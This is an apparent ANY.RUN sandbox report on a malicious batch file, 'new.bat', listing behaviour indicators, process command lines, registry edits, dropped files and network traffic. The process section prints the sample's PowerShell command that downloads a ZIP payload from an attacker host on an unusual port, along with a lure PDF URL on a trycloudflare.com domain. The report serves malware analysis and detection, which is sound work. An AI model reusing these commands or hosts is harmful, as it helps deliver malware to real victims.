File name:

new.bat

Full analysis: https://app.any.run/tasks/dd506a97-8721-4c17-86de-5bd40fec5e3b
Verdict: Malicious activity
Analysis date: July 27, 2024, 21:05:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
phishing
Indicators:
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (14150), with no line terminators
MD5:

2BD3CD5D43151A3DA40C26AD7A63E150

SHA1:

D6F881F60F447D3E14FD81E1CE1BC660A6E6DAA9

SHA256:

83126357A369AFD90C496CBB7D0081A8B5AE4AE43EA5E7DF582B93F241677BED

SSDEEP:

384:13c9iaKYfl4T2mQvOP3ieQ9UGd2jhnhgvX:9c9iaKYfl4qmQvOP3ieQ9UGd2jhnhgvX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • PHISHING has been detected (SURICATA)

      • msedge.exe (PID: 7300)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6524)

    • Changes the autorun value in the registry

      • reg.exe (PID: 6396)

  • SUSPICIOUS

    • Application launched itself

      • Skype.exe (PID: 1340)

    • Uses REG/REGEDIT.EXE to modify registry

      • Skype.exe (PID: 1340)

    • Reads security settings of Internet Explorer

      • Skype.exe (PID: 1340)

    • Downloads file from URI

      • powershell.exe (PID: 1296)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1896)

    • Detected use of alternative data streams (AltDS)

      • Skype.exe (PID: 1340)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1296)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6524)

    • Connects to unusual port

      • powershell.exe (PID: 1296)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6524)

    • Process drops python dynamic module

      • powershell.exe (PID: 6524)

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1896)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1896)

  • INFO

    • Checks proxy server information

      • slui.exe (PID: 1584)
      • slui.exe (PID: 5900)
      • Skype.exe (PID: 1340)
      • powershell.exe (PID: 1296)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3688)

    • Reads the software policy settings

      • slui.exe (PID: 5900)
      • slui.exe (PID: 1584)
      • Skype.exe (PID: 1340)

    • Checks supported languages

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 2960)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)
      • Skype.exe (PID: 1780)

    • Reads Environment values

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)

    • Creates files or folders in the user directory

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 1780)

    • Manual execution by a user

      • Skype.exe (PID: 1340)
      • cmd.exe (PID: 1896)
      • mspaint.exe (PID: 6476)

    • Reads the computer name

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)

    • Reads CPU info

      • Skype.exe (PID: 1340)

    • Create files in a temporary directory

      • Skype.exe (PID: 1340)

    • Process checks computer location settings

      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • Skype.exe (PID: 1340)

    • Reads the machine GUID from the registry

      • Skype.exe (PID: 1340)

    • Application launched itself

      • msedge.exe (PID: 2396)

    • Disables trace logs

      • powershell.exe (PID: 1296)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6524)

    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
194
Monitored processes
60
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start notepad.exe no specs slui.exe slui.exe skype.exe skype.exe no specs skype.exe no specs skype.exe reg.exe conhost.exe no specs skype.exe no specs reg.exe no specs conhost.exe no specs mspaint.exe no specs cmd.exe no specs conhost.exe no specs skype.exe no specs msedge.exe timeout.exe no specs powershell.exe msedge.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs #PHISHING msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs skype.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
524"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6560 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
968"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar" --no-sandbox --no-zygote --enable-blink-features --disable-blink-features --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --ms-disable-indexeddb-transaction-timeout --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3992 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exeSkype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1244"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6088 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1296powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipnng.site:4727/DXJS.zip' -OutFile 'C:\Users\admin\Downloads\DXJS.zip' }"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1340"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Desktop\new.bat.txt"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
explorer.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1584C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1780"C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --mojo-platform-channel-handle=2460 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Skype.exe
User:
admin
Company:
Skype Technologies S.A.
Integrity Level:
MEDIUM
Description:
Skype
Version:
8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
1896C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\new.bat.txt.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2068timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2396"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vancouver-mats-describe-survival.trycloudflare.com/kyvbsa.pdfC:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
34 513
Read events
34 444
Write events
50
Delete events
19

Modification events

(PID) Process:(6396) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Skype for Desktop
Value:
C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:en-US
Value:
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:en
Value:
(PID) Process:(1340) Skype.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries
Operation:delete valueName:_Global_
Value:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1896) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2396) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2396) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
Executable files
45
Suspicious files
106
Text files
415
Unknown types
0

Dropped files

PID
Process
Filename
Type
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.acltext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-msbinary
MD5:8786405114010246400E95724DC017A4
SHA256:0D6D2287D81B396EE757B7BEAA9F1931E7A462705CB6BFF6960174705A786587
4288Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.confbinary
MD5:99914B932BD37A50B983C5E7C90AE93B
SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
4288Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.tmpbinary
MD5:99914B932BD37A50B983C5E7C90AE93B
SHA256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.jsonbinary
MD5:95D3A9F5B2C5989A3E6A174FB3E21820
SHA256:5961A7DCBB98937F89DA58A47266F3E90DF340B8D255050312EB98356A006E70
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\js\index-dir\temp-indexbinary
MD5:7BEACAAE406C2E60924CC1DF3D987E62
SHA256:504047A53AC37ADE8A8BB443DFB309230526DD4B903508E902F251C271B36A61
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\settings.datbinary
MD5:9D0439A794AA96ABD6AFF504C86C7F31
SHA256:5DBC3A5DAF431973E245D83AB51B128E9C4CC2F3ECD61C45C88DB161ACC25B7B
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\MANIFEST-000001binary
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\000001.dbtmptext
MD5:46295CAC801E5D4857D09837238A6394
SHA256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
1340Skype.exeC:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\wasm\index-dir\the-real-indexbinary
MD5:AF6827A89A41716ADAA451C33277EE8A
SHA256:E7D89DF74701625E46DBAE8D74CC8FBA7829439059CDDBE4DB2F77343AB88892
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
51
TCP/UDP connections
87
DNS requests
57
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
20.190.160.17:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=0&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
GET
40.126.32.133:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=2&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
GET
401
13.107.6.158:443
https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox
unknown
OPTIONS
200
23.48.23.26:443
https://bzib.nelreports.net/api/report?cat=bingbusiness
unknown
1296
powershell.exe
GET
57.128.129.21:4727
http://trackmyshipnng.site:4727/DXJS.zip
unknown
unknown
GET
304
13.107.42.16:443
https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeRuntime%2CEdgeRuntimeConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=35&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1
unknown
GET
304
204.79.197.239:443
https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist
unknown
POST
200
104.126.37.136:443
https://gateway.bingviz.microsoftapp.net/receive?app=skype
unknown
binary
15 b
POST
200
40.79.189.58:443
https://self.events.data.microsoft.com/OneCollector/1.0/
unknown
binary
9 b
GET
200
13.107.21.239:443
https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=122.0.2365.59&experimentationmode=2&scpguard=0&scpfull=0&scpver=0
unknown
binary
807 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
131.253.33.254:443
a-ring-fallback.msedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3952
svchost.exe
239.255.255.250:1900
whitelisted
104.126.37.171:443
www.bing.com
Akamai International B.V.
DE
unknown
132
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2796
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6012
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6964
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2432
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
t-ring-fdv2.msedge.net
  • 13.107.237.254
unknown
a-ring-fallback.msedge.net
  • 131.253.33.254
unknown
www.bing.com
  • 104.126.37.171
  • 104.126.37.177
  • 104.126.37.163
  • 104.126.37.130
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.123
  • 104.126.37.179
  • 104.126.37.186
  • 104.126.37.139
  • 104.126.37.185
  • 104.126.37.136
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.129
  • 2.23.209.133
  • 2.23.209.149
  • 2.23.209.185
  • 2.23.209.140
  • 2.23.209.187
  • 2.23.209.130
  • 2.23.209.179
  • 2.23.209.182
  • 2.23.209.189
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.78
whitelisted
self.events.data.microsoft.com
  • 40.79.189.58
whitelisted
get.skype.com
  • 52.113.194.133
whitelisted
a.config.skype.com
  • 13.107.42.16
whitelisted
pipe.skype.com
  • 20.189.173.1
  • 20.189.173.11
whitelisted
b.config.skype.com
  • 13.107.42.16
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Cloudflare Domain Abuse for Phishing or OpenDir Purposes (RGDA)
1296
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
new.bat